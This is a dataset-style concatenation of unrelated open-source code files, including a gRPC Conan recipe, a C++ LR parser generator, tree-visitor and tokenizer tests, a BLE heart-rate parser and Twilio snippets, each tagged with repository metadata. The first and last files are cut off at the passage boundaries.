string_to_return += char
#add the last lettr pus a space
#if word[i]:
string_to_return += word[i]
#string_to_return += punctuation_[i]
string_to_return += punctuation_[string_words.index(word)]
print(punctuation_[string_words.index(word)])
#flush the string
current_word.clear()
#next word!
print(string_to_return)
print(punctuation_)
#done
#string_jumble("a0boop1boop3boop4boop5hey")
string_jumble("I1think2my3dog4is5terribly6lazy;7I8-9I!mean,£he$-%is^really&quite*fat.")#looks like list.index won't work for us
#string_jumble("")#fix this too
| Moth-Tolias/LetterBoy | backend/jumbles nontrobo/jumbles nontrobo.py | Python | gpl-3.0 | 4,226 | 0.018462 |
alist = ['Micheal', 'Franklin', 'Trevor']
for i in alist:
print "Happy birthday, " + i
| BedrockDev/Sunrin2017 | Software/Web Programming/Project07/exam_03.py | Python | mit | 91 | 0 |
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
import shutil
import time
import platform
class grpcConan(ConanFile):
name = "grpc"
version = "1.27.3"
description = "Google's RPC library and framework."
topics = ("conan", "grpc", "rpc")
url = "https://github.com/inexorgame/conan-grpc"
homepage = "https://github.com/grpc/grpc"
license = "Apache-2.0"
exports_sources = ["CMakeLists.txt", "gRPCTargets-helpers.cmake"]
generators = "cmake"
short_paths = True # Otherwise some folders go out of the 260 chars path length scope rapidly (on windows)
settings = "os", "arch", "compiler", "build_type"
options = {
"fPIC": [True, False],
}
default_options = {
"fPIC": True,
}
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
requires = (
"abseil/20211102.0",
"zlib/1.2.11",
"openssl/1.1.1k",
"protobuf/3.9.1@bincrafters/stable",
"c-ares/1.15.0"
)
def build_requirements(self):
self.build_requires("protoc_installer/3.9.1@bincrafters/stable")
if self.user and self.channel:
self.build_requires("grpc_codegen/{}@{}/{}".format(self.version, self.user, self.channel))
else:
self.build_requires("grpc_codegen/{}".format(self.version))
def configure(self):
if self.settings.os == "Windows" and self.settings.compiler == "Visual Studio":
del self.options.fPIC
compiler_version = int(str(self.settings.compiler.version))
if compiler_version < 14:
raise ConanInvalidConfiguration("gRPC can only be built with Visual Studio 2015 or higher.")
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = "grpc-" + self.version
if platform.system() == "Windows":
time.sleep(8) # Work-around, see https://github.com/conan-io/conan/issues/5205
os.rename(extracted_dir, self._source_subfolder)
cmake_path = os.path.join(self._source_subfolder, "CMakeLists.txt")
tools.replace_in_file(cmake_path, "absl::strings", "CONAN_PKG::abseil")
tools.replace_in_file(cmake_path, "absl::optional", "CONAN_PKG::abseil")
tools.replace_in_file(cmake_path, "absl::inlined_vector", "CONAN_PKG::abseil")
tools.replace_in_file(cmake_path, "set(_gRPC_CPP_PLUGIN $<TARGET_FILE:grpc_cpp_plugin>)", "find_program(_gRPC_CPP_PLUGIN grpc_cpp_plugin)")
tools.replace_in_file(cmake_path, "DEPENDS ${ABS_FIL} ${_gRPC_PROTOBUF_PROTOC} grpc_cpp_plugin", "DEPENDS ${ABS_FIL} ${_gRPC_PROTOBUF_PROTOC} ${_gRPC_CPP_PLUGIN}")
_cmake = None
def _configure_cmake(self):
if self._cmake:
return self._cmake
cmake = CMake(self)
cmake.definitions['gRPC_BUILD_CODEGEN'] = "ON"
cmake.definitions['gRPC_BUILD_CSHARP_EXT'] = "OFF"
cmake.definitions['gRPC_BUILD_TESTS'] = "OFF"
cmake.definitions['gRPC_INSTALL'] = "ON"
cmake.definitions["gRPC_BUILD_GRPC_CPP_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_CSHARP_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_OBJECTIVE_C_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_PHP_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_PYTHON_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_RUBY_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_NODE_PLUGIN"] = "OFF"
# tell grpc to use the find_package versions
cmake.definitions['gRPC_CARES_PROVIDER'] = "package"
cmake.definitions['gRPC_ZLIB_PROVIDER'] = "package"
cmake.definitions['gRPC_SSL_PROVIDER'] = "package"
cmake.definitions['gRPC_PROTOBUF_PROVIDER'] = "none"
cmake.definitions['gRPC_ABSL_PROVIDER'] = "none"
# Workaround for https://github.com/grpc/grpc/issues/11068
cmake.definitions['gRPC_GFLAGS_PROVIDER'] = "none"
cmake.definitions['gRPC_BENCHMARK_PROVIDER'] = "none"
# Compilation on minGW GCC requires to set _WIN32_WINNTT to at least 0x600
# https://github.com/grpc/grpc/blob/109c570727c3089fef655edcdd0dd02cc5958010/include/grpc/impl/codegen/port_platform.h#L44
if self.settings.os == "Windows" and self.settings.compiler == "gcc":
cmake.definitions["CMAKE_CXX_FLAGS"] = "-D_WIN32_WINNT=0x600"
cmake.definitions["CMAKE_C_FLAGS"] = "-D_WIN32_WINNT=0x600"
cmake.configure(build_folder=self._build_subfolder)
self._cmake = cmake
return cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
cmake = self._configure_cmake()
cmake.install()
shutil.rmtree(os.path.join(self.package_folder, "lib", "pkgconfig"))
shutil.rmtree(os.path.join(self.package_folder, "lib", "cmake", "grpc", "modules"))
self.copy("gRPCTargets-helpers.cmake", dst=os.path.join("lib", "cmake", "grpc"))
self.copy("LICENSE*", src=self._source_subfolder, dst="licenses")
def package_info(self):
self.cpp_info.libs = [
"grpc++_unsecure",
"grpc++_reflection",
"grpc++_error_details",
"grpc++",
"grpc_unsecure",
"grpc_plugin_support",
"grpc_cronet",
"grpcpp_channelz",
"grpc",
"gpr",
"address_sorting",
"upb",
]
if self.settings.compiler == "Visual Studio":
self.cpp_info.system_libs += ["wsock32", "ws2_32"]
| google/orbit | third_party/conan/recipes/grpc/conanfile.py | Python | bsd-2-clause | 5,670 | 0.002822 |
#!/usr/bin/python3
import argparse
import collections
import json
import string
import sys
header_template = """
#ifndef ASPARSERATIONS_GENERATED_${class_name}_H_
#define ASPARSERATIONS_GENERATED_${class_name}_H_
#include <array>
#include <map>
#include <memory>
#include <set>
#include <utility>
#include <vector>
$header_front
$begin_namespace
enum class Token
{
$tokens
};
enum class Nonterminal
{
$nonterminals
};
enum class Production
{
$productions
};
struct Lexer_State
{
const char* begin;
const char* end;
unsigned int lines;
const char* last_newline;
};
Lexer_State next(const Lexer_State&);
/**
*/
class Node
{
public:
Node(const $payload&, const Lexer_State&);
Node(const $payload&, std::vector<std::unique_ptr<Node>>);
const $payload& payload() const;
const std::vector<std::unique_ptr<Node>>& children() const;
const Lexer_State& state() const;
virtual ~Node() = default;
private:
$payload m_payload;
std::vector<std::unique_ptr<Node>> m_children;
Lexer_State m_state;
};
class $class_name
{
public:
$class_name();
std::unique_ptr<Node> parse(const std::string&, $lexer&, $callback&);
static std::string nonterminal_to_string(Nonterminal);
static std::string production_to_string(Production);
virtual ~$class_name() = default;
private:
struct Mangled_Production
{
const Nonterminal nonterminal;
const Production production;
unsigned int child_count;
};
struct Productions
{
Productions();
$mangled_productions_header
};
struct State
{
std::map<Token,std::pair<const State*,std::set<const Mangled_Production*>>>
actions;
std::map<Nonterminal,const State*> gotos;
};
std::vector<State> m_states;
std::vector<std::pair<std::unique_ptr<Node>,const State*>> m_stack;
std::unique_ptr<Productions> m_productions;
void m_process(const State&, const Lexer_State&, $lexer&, $callback&, std::unique_ptr<Node>&);
void m_reduce(const Mangled_Production&, $callback&, std::unique_ptr<Node>&);
};
$end_namespace
#endif
"""
src_template = """
#include <algorithm>
#include <stdexcept>
#include <utility>
#include "../include/$class_name.hpp"
$src_front
$namespace::Lexer_State $namespace::next(const $namespace::Lexer_State& ls)
{
$namespace::Lexer_State ls_prime = {
ls.end,
ls.end,
ls.lines,
ls.last_newline
};
return ls_prime;
}
$namespace::Node::Node(const $payload& payload,
const $namespace::Lexer_State& state)
: m_payload(payload), m_state(state) {}
$namespace::Node::Node(const $payload& payload,
std::vector<std::unique_ptr<Node>> children)
{
if(children.empty())
throw std::runtime_error("Zero children,"
"call Node(const char*, const char*) instead");
m_payload = payload;
m_children = std::move(children);
m_state = $namespace::Lexer_State {
m_children.front()->state().begin,
m_children.back()->state().end,
m_children.back()->state().lines,
m_children.back()->state().last_newline
};
}
const $payload& $namespace::Node::payload() const
{
return m_payload;
}
const std::vector<std::unique_ptr<$namespace::Node>>&
$namespace::Node::children() const
{
return m_children;
}
const $namespace::Lexer_State& $namespace::Node::state() const
{
return m_state;
}
$namespace::$class_name::Productions::Productions()
: $mangled_productions_src
{
}
$namespace::$class_name::$class_name()
: m_productions(new Productions()), m_states($state_count)
{
$states
}
std::unique_ptr<$namespace::Node>
$namespace::$class_name::parse(const std::string& input,
$lexer& lexer,
$callback& callback)
{
std::unique_ptr<Node> root;
m_process(m_states.front(),
$namespace::Lexer_State{input.data(), input.data(),
1, input.data() - 1},
lexer, callback, root);
while(!m_stack.empty()) {
m_process(*m_stack.back().second,
$namespace::next(m_stack.back().first->state()),
lexer, callback, root);
}
return root;
}
std::string
$namespace::$class_name::nonterminal_to_string($namespace::Nonterminal nt)
{
switch(nt) {
$nonterminals_to_strings
}
throw std::runtime_error("Unknown nonterminal");
}
std::string
$namespace::$class_name::production_to_string($namespace::Production p)
{
switch(p) {
$productions_to_strings
}
throw std::runtime_error("Unknown production");
}
void $namespace::$class_name::m_process(
const $namespace::$class_name::State& state,
const $namespace::Lexer_State& lex_state,
$lexer& lexer,
$callback& callback,
std::unique_ptr<$namespace::Node>& root)
{
$namespace::Lexer_State err;
for(auto& action : state.actions) {
auto result = lexer.expect(action.first, lex_state);
err = result.first;
if(result.second) {
if(action.second.first != nullptr) {
try {
m_stack.emplace_back(
std::unique_ptr<$namespace::Node>(new Node(callback.call(action.first,
std::string(result.first.begin,
result.first.end)),
result.first)),
action.second.first
);
} catch(std::runtime_error& e) {
throw std::runtime_error(std::to_string(err.lines) + ":"
+ std::to_string(err.end - 1 - err.last_newline) + ": " + e.what());
}
return;
}
if(!action.second.second.empty()) {
m_reduce(**action.second.second.begin(), callback, root);
return;
}
}
}
throw std::runtime_error("Failed parse: " + std::to_string(err.lines)
+ ":" + std::to_string(err.end - err.last_newline));
}
void $namespace::$class_name::m_reduce(
const $namespace::$class_name::Mangled_Production& production,
$callback& callback,
std::unique_ptr<$namespace::Node>& root)
{
if(m_stack.empty()) throw std::runtime_error("Can't reduce empty stack");
std::unique_ptr<$namespace::Node> node = nullptr;
if(production.child_count == 0) {
node = std::unique_ptr<$namespace::Node>(new Node(callback.call(production.nonterminal,
production.production,
{}),
$namespace::next(m_stack.back().first->state())));
} else {
std::vector<std::unique_ptr<Node>> popped;
for(int i = 0; i < production.child_count; ++i) {
if(m_stack.empty()) throw std::runtime_error("Stack underflow");
popped.push_back(std::move(m_stack.back().first));
m_stack.pop_back();
}
std::reverse(popped.begin(), popped.end());
try {
auto temp = callback.call(production.nonterminal, production.production, popped);
node = std::unique_ptr<$namespace::Node>(new Node(temp, std::move(popped)));
} catch(std::runtime_error& e) {
throw std::runtime_error(std::string("Error: ") + e.what());
}
}
if(production.nonterminal == Nonterminal::accept_) {
root = std::move(node);
return;
}
const State* state;
if(m_stack.empty()) {
state = &m_states[0];
} else {
state = m_stack.back().second;
}
auto iter = state->gotos.find(production.nonterminal);
if(iter == m_stack.back().second->gotos.end()) {
throw std::runtime_error("Unknown nonterminal");
}
m_stack.emplace_back(std::move(node), iter->second);
}
"""
def gen_namespace_decls(namespaces):
begin = ""
end = ""
for namespace in namespaces:
begin += "namespace " + namespace + " {\n"
end = "} // " + namespace + "\n" + end
return {"begin_namespace" : begin, "end_namespace" : end}
def gen_production_list(grammar):
names = set()
for name,productions in grammar["nonterminals"].items():
for prodname,wildcard in productions.items():
names.add(prodname)
lines = ",\n ".join(names)
return lines
def gen_mangled_production_list_header(grammar):
lines = ""
for name,productions in grammar["nonterminals"].items():
for prodname,symbols in productions.items():
lines += "Mangled_Production " + name + "_" + prodname + ";\n "
return lines
def gen_header(template, table, config):
tokens = ",\n ".join(table["grammar"]["tokens"])
nonterminal_list = []
for name, wildcard in table["grammar"]["nonterminals"].items():
nonterminal_list.append(name)
nonterminals = ",\n ".join(nonterminal_list)
mangled_productions = gen_mangled_production_list_header(table["grammar"])
productions = gen_production_list(table["grammar"])
# Lost in stupid parentheses
return string.Template( \
string.Template( \
string.Template(template) \
.safe_substitute(config)) \
.safe_substitute(tokens=tokens, nonterminals=nonterminals, \
mangled_productions_header=mangled_productions, \
productions=productions,
state_count=str(len(table["table"])))) \
.substitute(gen_namespace_decls(config["namespace"]))
def gen_namespace_prefix(namespaces):
return "::".join(namespaces)
def gen_mangled_productions_src(grammar):
lines = []
for name,productions in grammar["nonterminals"].items():
for prodname,symbols in productions.items():
lines.append(name + "_" + prodname + " {Nonterminal::"\
+ name + ", " + "Production::" + prodname + ", " \
+ str(len(symbols)) + "}")
return ",\n ".join(lines)
def gen_state(template, state, config):
actions = []
gotos = []
for token, action in state["actions"].items():
action_str = "{\n Token::" + token + ", {"
if action["shift"] is None:
action_str += "nullptr, {\n "
else:
action_str += "&m_states["+str(action["shift"])+"], {\n "
reduce_strs = map(lambda x :
"&m_productions->" + x["nonterminal"]
+ "_" + x["production"],\
action["reductions"])
reduce_str = ",\n ".join(reduce_strs)
action_str += reduce_str + "\n }}\n }"
actions.append(action_str)
for nonterminal, index in state["gotos"].items():
goto_str = "{Nonterminal::" + nonterminal \
+ ", &m_states[" + str(index) + "]}"
gotos.append(goto_str)
actions_str = ",\n ".join(actions)
gotos_str = ",\n ".join(gotos)
return "m_states[" + str(state["index"]) \
+ "] = State {\n { // actions\n " + actions_str + "\n }" \
+ ",\n { // gotos \n " + gotos_str + "\n }\n };"
def gen_nonterminal_to_strings(nonterminal):
name, wildcard = nonterminal
return "case Nonterminal::" + name + ": return \"" + name + "\";"
def gen_productions_to_strings(grammar):
names = set()
for name,productions in grammar["nonterminals"].items():
for prodname,wildcard in productions.items():
names.add(prodname)
lines = map(lambda p: "case Production::" + p + ": return \"" + p \
+ "\";",
names)
return "\n ".join(lines)
def gen_src(template, table, config):
namespace_prefix = gen_namespace_prefix(config["namespace"])
states = map(lambda x : gen_state(template, x, config), table["table"])
states_text = "\n ".join(states)
nonterminals_to_strings = "\n ".join(map(gen_nonterminal_to_strings,\
table["grammar"]["nonterminals"]\
.items()))
return string.Template(string.Template(template) \
.safe_substitute(namespace=namespace_prefix, states=states_text, \
state_count=len(table["table"]),\
nonterminals_to_strings=nonterminals_to_strings,\
productions_to_strings\
=gen_productions_to_strings(table["grammar"]),\
mangled_productions_src=\
gen_mangled_productions_src(table["grammar"]))) \
.safe_substitute(config)
def main():
argparser = argparse.ArgumentParser()
argparser.add_argument("json")
argparser.add_argument("config")
argparser.add_argument("dest")
args = argparser.parse_args()
table = json.load(open(args.json, "r"),\
object_pairs_hook=collections.OrderedDict)
config = json.load(open(args.config, "r"))
dest = args.dest
header_file = open(dest + "/include/" + config["class_name"] + ".hpp", "w+")
src_file = open(dest + "/src/" + config["class_name"] + ".cpp", "w+")
header_file.write(gen_header(header_template, table, config))
src_file.write(gen_src(src_template, table, config))
header_file.close()
src_file.close()
if __name__ == '__main__':
main()
| TheAspiringHacker/Asparserations | bootstrap/parser_gen.py | Python | mit | 13,102 | 0.004427 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors and Contributors
# See license.txt
import frappe
import unittest
test_records = frappe.get_test_records('Note')
class TestNote(unittest.TestCase):
pass
| indictranstech/omnitech-frappe | frappe/desk/doctype/note/test_note.py | Python | mit | 225 | 0.013333 |
# Copyright (C) 2013 Korei Klein <korei.klein1@gmail.com>
from calculus.enriched import formula, constructors, endofunctor
from calculus.basic import formula as basicFormula
from lib.common_symbols import leftSymbol, rightSymbol, relationSymbol, domainSymbol, inputSymbol, outputSymbol, functionPairsSymbol
from lib import common_vars
from calculus import variable
def IsEquivalence(e):
return constructors.Always(constructors.Holds(e, common_vars.equivalence))
def Maps(a, b, f):
return constructors.Always(constructors.Holds(
variable.ProductVariable([ (inputSymbol, a)
, (outputSymbol, b)]),
variable.ApplySymbolVariable(f, functionPairsSymbol)))
def IsFunction(f):
return constructors.Always(constructors.Holds(f, common_vars.function))
InDomain = formula.InDomain
Equal = formula.Equal
Identical = formula.Identical
def InductionBase(var, claim):
return claim.substituteVariable(var, common_vars.zero)
def InductionStep(var, claim):
newVar = var.relatedVariable()
return constructors.Forall([constructors.BoundedVariableBinding(newVar, common_vars.natural)],
constructors.Implies([claim.substituteVariable(var, newVar)],
claim.updateVariables().substituteVariable(var, variable.ApplySymbolVariable(newVar, common_vars.S))))
def InductionHypotheses(var, claim):
return constructors.And([InductionBase(var, claim), InductionStep(var, claim)])
def InductionConclusion(var, claim):
newVar = var.relatedVariable()
return constructors.Forall([constructors.BoundedVariableBinding(newVar, common_vars.natural)],
claim.substituteVariable(var, newVar))
def Induction(var, claim):
return constructors.Implies([InductionBase(var, claim), InductionStep(var, claim)],
InductionConclusion(var, claim))
def _forwardImportInduction(x, var, claim):
hypotheses = InductionHypotheses(var, claim)
conclusion = InductionConclusion(var, claim)
return constructors.assume(x, hypotheses).forwardFollow(lambda x:
formula.Arrow(src = x,
tgt = constructors.Not(
constructors.And([hypotheses, constructors.Not(constructors.And([conclusion, x]))])),
basicArrow = x.translate().forwardOnNotFollow(lambda x:
x.backwardOnRightFollow(lambda x:
x.backwardOnNotFollow(lambda x:
x.forwardOnLeftFollow(lambda x:
basicFormula.Induction(src = x, tgt = conclusion.translate())))))))
def forwardImportInductionAndContradict(x, var, claim):
assert(x.__class__ == formula.Exists)
hypotheses = InductionHypotheses(var, claim)
conclusion = InductionConclusion(var, claim)
return constructors.assume(x.updateVariables(), hypotheses).forwardFollow(lambda x:
formula.Arrow(src = x.updateVariables(), tgt = constructors.Not(hypotheses),
basicArrow = x.translate().forwardOnNotFollow(lambda x:
x.backwardOnRightFollow(lambda x:
x.backwardOnNotFollow(lambda x:
x.forwardOnLeftFollow(lambda x:
basicFormula.Induction(src = x, tgt = conclusion.translate())).forwardFollow(lambda x:
x.forwardCommute().forwardFollow(lambda x:
x.forwardOnLeftFollow(lambda x:
x.forwardOnBodyFollow(lambda x:
x.forwardOnRightFollow(lambda x:
x.forwardDoubleDual())))).forwardFollow(lambda x:
x.forwardContradict())))).backwardFollow(lambda x:
x.backwardOnRightFollow(lambda x:
basicFormula.trueIsNotFalse).backwardFollow(lambda x:
x.backwardIntroUnitLeft())))))
def forwardInductionOnIExists(x, i):
var = x.bindings[i].variable
claim = constructors.Not(x.value)
a = x.forwardPushAndSplit(i)
a = a.forwardFollow(lambda x:
endofunctor.Exists(x.bindings).onArrow(forwardImportInductionAndContradict(x.value, var, claim)))
return a
| koreiklein/fantasia | lib/common_formulas.py | Python | gpl-2.0 | 3,977 | 0.023887 |
# Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Imports objects into the top-level common namespace."""
from __future__ import absolute_import
from .beam_search import beam_search
from .nade import Nade
from .sequence_example_lib import count_records
from .sequence_example_lib import flatten_maybe_padded_sequences
from .sequence_example_lib import get_padded_batch
from .sequence_example_lib import make_sequence_example
from .tf_utils import merge_hparams
| jesseengel/magenta | magenta/common/__init__.py | Python | apache-2.0 | 1,001 | 0 |
"""Unit-tests for `tree.visitors`
"""
from py2c import tree
from py2c.tree import visitors
from py2c.tests import Test, data_driven_test
from nose.tools import assert_equal
# TEST:: Add non-node fields
# =============================================================================
# Helper classes
# =============================================================================
class BasicNode(tree.Node):
_fields = []
class BasicNodeReplacement(tree.Node):
_fields = []
class BasicNodeWithListReplacement(tree.Node):
_fields = []
class BasicNodeDeletable(tree.Node):
_fields = []
class ParentNode(tree.Node):
_fields = [
('child', tree.Node, 'OPTIONAL'),
]
class ParentNodeWithChildrenList(tree.Node):
"""Node with list of nodes as field
"""
_fields = [
('child', tree.Node, 'ZERO_OR_MORE'),
]
# -----------------------------------------------------------------------------
# Concrete Visitors used for testing
# -----------------------------------------------------------------------------
class VisitOrderCheckingVisitor(visitors.RecursiveNodeVisitor):
def __init__(self):
super().__init__()
self.visited = []
def generic_visit(self, node):
self.visited.append(node.__class__.__name__)
super().generic_visit(node)
def visit_BasicNodeReplacement(self, node):
self.visited.append("visited Copy!")
class AccessPathCheckingVisitor(visitors.RecursiveNodeVisitor):
def __init__(self):
super().__init__()
self.recorded_access_path = None
def visit_BasicNode(self, node):
self.recorded_access_path = self.access_path[:]
class EmptyTransformer(visitors.RecursiveNodeTransformer):
pass
class VisitOrderCheckingTransformer(visitors.RecursiveNodeTransformer):
def __init__(self):
super().__init__()
self.visited = []
def generic_visit(self, node):
self.visited.append(node.__class__.__name__)
return super().generic_visit(node)
def visit_BasicNodeReplacement(self, node):
self.visited.append("visited Copy!")
return node
class AccessPathCheckingTransformer(visitors.RecursiveNodeTransformer):
def __init__(self):
super().__init__()
self.recorded_access_path = None
def visit_BasicNode(self, node):
self.recorded_access_path = self.access_path[:]
return node
class TransformationCheckingTransformer(visitors.RecursiveNodeTransformer):
def visit_BasicNode(self, node):
return BasicNodeReplacement()
def visit_BasicNodeDeletable(self, node):
return None # Delete this node
def visit_BasicNodeReplacement(self, node):
return self.NONE_DEPUTY # Replace this node with None
def visit_BasicNodeWithListReplacement(self, node):
return [BasicNode(), BasicNodeReplacement()]
# -----------------------------------------------------------------------------
# Tests
# -----------------------------------------------------------------------------
class TestRecursiveASTVisitor(Test):
"""py2c.tree.visitors.RecursiveNodeVisitor
"""
context = globals()
@data_driven_test("visitors-visitor_order.yaml", prefix="visit order of ")
def test_visit_order(self, node, order):
to_visit = self.load(node)
# The main stuff
visitor = VisitOrderCheckingVisitor()
retval = visitor.visit(to_visit)
assert_equal(retval, None)
assert_equal(visitor.visited, order)
@data_driven_test("visitors-access_path.yaml", prefix="access path on visit of ")
def test_access_path(self, node, access):
to_visit = self.load(node)
access_path = self.load(access)
# The main stuff
visitor = AccessPathCheckingVisitor()
retval = visitor.visit(to_visit)
assert_equal(retval, None)
assert_equal(visitor.recorded_access_path, access_path)
class TestRecursiveASTTransformer(Test):
"""py2c.tree.visitors.RecursiveNodeTransformer
"""
context = globals()
@data_driven_test("visitors-visitor_order.yaml", prefix="empty transformer does not transform ")
def test_empty_transformer(self, node, order):
to_visit = self.load(node)
# The main stuff
visitor = EmptyTransformer()
retval = visitor.visit(to_visit)
assert_equal(to_visit, retval)
@data_driven_test("visitors-visitor_order.yaml", prefix="visit order of ")
def test_visit_order(self, node, order):
to_visit = self.load(node)
# The main stuff
visitor = VisitOrderCheckingTransformer()
retval = visitor.visit(to_visit)
assert_equal(to_visit, retval)
assert_equal(visitor.visited, order)
@data_driven_test("visitors-access_path.yaml", prefix="access path on visit of ")
def test_access_path(self, node, access):
to_visit = self.load(node)
access_path = self.load(access)
# The main stuff
visitor = AccessPathCheckingTransformer()
retval = visitor.visit(to_visit)
assert_equal(retval, to_visit)
assert_equal(visitor.recorded_access_path, access_path)
@data_driven_test("visitors-transform.yaml", prefix="transformation of ")
def test_transformation(self, node, expected):
to_visit = self.load(node)
expected_node = self.load(expected)
# The main stuff
visitor = TransformationCheckingTransformer()
retval = visitor.visit(to_visit)
assert_equal(retval, expected_node)
if __name__ == '__main__':
from py2c.tests import runmodule
runmodule()
| pradyunsg/Py2C | py2c/tree/tests/test_visitors.py | Python | bsd-3-clause | 5,659 | 0.00053 |
from twilio.twiml.voice_response import VoiceResponse, Say, Sms
response = VoiceResponse()
response.say('Our store is located at 123 Easy St.')
response.sms('Store Location: 123 Easy St.')
print(response)
| TwilioDevEd/api-snippets | twiml/voice/sms/sms-2/sms-2.6.x.py | Python | mit | 207 | 0 |
#!/usr/bin/python
import ble
import uuids
OPCODE_RESET_EXPENDED=1
class HeartRateService(ble.Service):
uuid=uuids.heart_rate
class HeartRateControlPoint(ble.Characteristic):
uuid=uuids.heart_rate_control_point
def reset_expended(self):
opcode = OPCODE_RESET_EXPENDED
self.value = [opcode]
class HeartRateMeasurement(ble.Characteristic):
uuid=uuids.heart_rate_measurement
@property
def value(self):
return self.interpret_raw_hrm_measurement(self.raw)
def interpret_raw_hrm_measurement(self, raw_value):
value = [ord(c) for c in raw_value]
flags = value.pop(0)
hr_format = (flags>>0) & 1;
contact_status = (flags>>1) & 3;
expended_present = (flags>>3) & 1;
rr_present = (flags>>4) & 1;
meas={}
meas['hr'] = value.pop(0)
if (hr_format):
meas['hr'] += 256*value.pop(0)
if (contact_status & 2):
meas['sensor_contact'] = bool(contact_status & 1)
if expended_present:
e = value.pop(0)
e += 256*value.pop(0)
meas['energy_expended'] = e
if rr_present:
rr = []
while value:
rr_val = value.pop(0)
rr_val += 256*value.pop(0)
rr_val /= 1024.
rr.append(rr_val)
meas['rr'] = rr
return meas
| markrages/ble | profiles/hrm_service.py | Python | mit | 1,438 | 0.013908 |
# coding: utf-8
"""Test that tokenizer exceptions and emoticons are handles correctly."""
from __future__ import unicode_literals
import pytest
@pytest.mark.parametrize('text', ["auf'm", "du's", "über'm", "wir's"])
def test_de_tokenizer_splits_contractions(de_tokenizer, text):
tokens = de_tokenizer(text)
assert len(tokens) == 2
@pytest.mark.parametrize('text', ["z.B.", "d.h.", "Jan.", "Dez.", "Chr."])
def test_de_tokenizer_handles_abbr(de_tokenizer, text):
tokens = de_tokenizer(text)
assert len(tokens) == 1
def test_de_tokenizer_handles_exc_in_text(de_tokenizer):
text = "Ich bin z.Zt. im Urlaub."
tokens = de_tokenizer(text)
assert len(tokens) == 6
assert tokens[2].text == "z.Zt."
assert tokens[2].lemma_ == "zur Zeit"
@pytest.mark.parametrize('text,norms', [("vor'm", ["vor", "dem"]), ("du's", ["du", "es"])])
def test_de_tokenizer_norm_exceptions(de_tokenizer, text, norms):
tokens = de_tokenizer(text)
assert [token.norm_ for token in tokens] == norms
@pytest.mark.xfail
@pytest.mark.parametrize('text,norm', [("daß", "dass")])
def test_de_lex_attrs_norm_exceptions(de_tokenizer, text, norm):
tokens = de_tokenizer(text)
assert tokens[0].norm_ == norm
| recognai/spaCy | spacy/tests/lang/de/test_exceptions.py | Python | mit | 1,230 | 0.000814 |
import asyncio
from mandelbrot.transport import *
class MockTransport(Transport):
def mock_create_item(self, path, item):
raise NotImplementedError()
@asyncio.coroutine
def create_item(self, path, item):
return self.mock_create_item(path, item)
def mock_replace_item(self, path, item):
raise NotImplementedError()
@asyncio.coroutine
def replace_item(self, path, item):
return self.mock_replace_item(path, item)
def mock_delete_item(self, path):
raise NotImplementedError()
@asyncio.coroutine
def delete_item(self, path):
return self.mock_delete_item(path)
def mock_get_item(self, path, filters):
raise NotImplementedError()
@asyncio.coroutine
def get_item(self, path, filters):
return self.mock_get_item(path, filters)
def mock_patch_item(self, path, fields, constraints):
raise NotImplementedError()
@asyncio.coroutine
def patch_item(self, path, fields, constraints):
return self.mock_patch_item(path, fields, constraints)
def mock_get_collection(self, path, matchers, count, last):
raise NotImplementedError()
@asyncio.coroutine
def get_collection(self, path, matchers, count, last):
return self.mock_get_collection(path, matchers, count, last)
def mock_delete_collection(self, path, params):
raise NotImplementedError()
@asyncio.coroutine
def delete_collection(self, path, params):
return self.mock_delete_collection(path, params)
| msfrank/mandelbrot | test/mock_transport.py | Python | gpl-3.0 | 1,546 | 0.000647 |
from collections import OrderedDict
from datetime import datetime
from skylines.api import schemas
def test_user_schema(test_user):
""":type test_user: skylines.model.User"""
data, errors = schemas.user_schema.dump(test_user)
assert not errors
assert isinstance(data, OrderedDict)
assert data.keys() == [
'id',
'name',
'first_name',
'last_name',
'club',
'tracking_delay',
'tracking_call_sign',
'created_at'
]
assert data['id'] == test_user.id
assert data['name'] == test_user.name
assert data['first_name'] == test_user.first_name
assert data['last_name'] == test_user.last_name
assert data['tracking_delay'] == test_user.tracking_delay
assert data['tracking_call_sign'] == test_user.tracking_callsign
created_at = datetime.strptime(data['created_at'], '%Y-%m-%dT%H:%M:%S.%f+00:00')
assert isinstance(created_at, datetime)
assert created_at == test_user.created
def test_user_list_schema(test_user):
""":type test_user: skylines.model.User"""
data, errors = schemas.user_list_schema.dump(test_user)
assert not errors
assert isinstance(data, OrderedDict)
assert data.keys() == [
'id',
'name',
'first_name',
'last_name',
]
assert data['id'] == test_user.id
assert data['name'] == test_user.name
assert data['first_name'] == test_user.first_name
assert data['last_name'] == test_user.last_name
def test_current_user_schema(test_user):
""":type test_user: skylines.model.User"""
data, errors = schemas.current_user_schema.dump(test_user)
assert not errors
assert isinstance(data, OrderedDict)
assert data.keys() == [
'id',
'name',
'first_name',
'last_name',
'club',
'tracking_delay',
'tracking_call_sign',
'created_at',
'email',
'tracking_key',
'admin',
]
assert data['id'] == test_user.id
assert data['name'] == test_user.name
assert data['first_name'] == test_user.first_name
assert data['last_name'] == test_user.last_name
assert data['email'] == test_user.email_address
assert data['tracking_key'] == ('%X' % test_user.tracking_key)
assert data['tracking_delay'] == test_user.tracking_delay
assert data['tracking_call_sign'] == test_user.tracking_callsign
created_at = datetime.strptime(data['created_at'], '%Y-%m-%dT%H:%M:%S.%f+00:00')
assert isinstance(created_at, datetime)
assert created_at == test_user.created
| kerel-fs/skylines | tests/api/schemas/user_test.py | Python | agpl-3.0 | 2,586 | 0.000773 |
"""Plot implied timescales vs lagtime
{{header}}
"""
